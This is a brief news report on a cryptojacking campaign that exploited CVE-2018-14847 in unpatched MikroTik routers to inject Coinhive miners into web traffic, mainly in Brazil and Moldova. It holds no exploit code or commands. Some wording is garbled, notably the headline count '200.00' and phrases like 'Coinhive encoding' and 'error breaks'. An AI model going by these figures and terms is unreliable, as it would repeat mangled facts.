This Cryptojacking Campaign Infected Over 200.00 Mikrotik Routers

A cryptojacking infected more than 200.00 Mikrotik routers which failed to solve the vulnerability issue of the system four months after security error for MikroTik routers was launched.

Security error CVE-2018-14847 identified within MikroTik routers was used by illegal crypto miners to install Coinhive encoding on platforms visited by users. It was found that initially, hackers infected thousands of routers in Brazil, as reported by SpiderLabs, a security research company.

“Our researcher @Simon_Kenin has discovered a massive #IoT #cryptojacking campaign affecting tens of thousands of unpatched @mikrotik_com routers in Brazil and going global. Read more here”

The high exposure rate in MikroTik Ethernet and Wi-Fi routers allowed hackers to omit the authentication step and enter the system, managing to quickly gain control over it. This attack was identified back in April, and as a result, the router maker launched a security patch.

It all started in Brazil

The researchers found that the Coinhive script was first introduced in 175,000 routers based in Brazil. With the installation of the second site key, it infected an additional number of 25,000 routers in the Republic of Moldova, reported researcher Troy Mursch.

The infection has spread rapidly on all websites visited by users. In order not to be identified, the hacker limited to installing the crypto mining script only in error breaks. Furthermore, the hacker removed any trace from the router system after it was compromised.

The cryptojacking targets especially MikroTik routers identified in Brazil. It is assumed that a large number of routers were not reviewed after the security issue was solved four months ago, meaning that these routers are subjected to a major risk of being attacked again.

“There are hundreds of thousands of these devices around the globe, in use by ISPs and different organizations and businesses, each device serves at least tens if not hundreds of users daily,” Simon Kenin, a security researcher at SpiderLabs reported.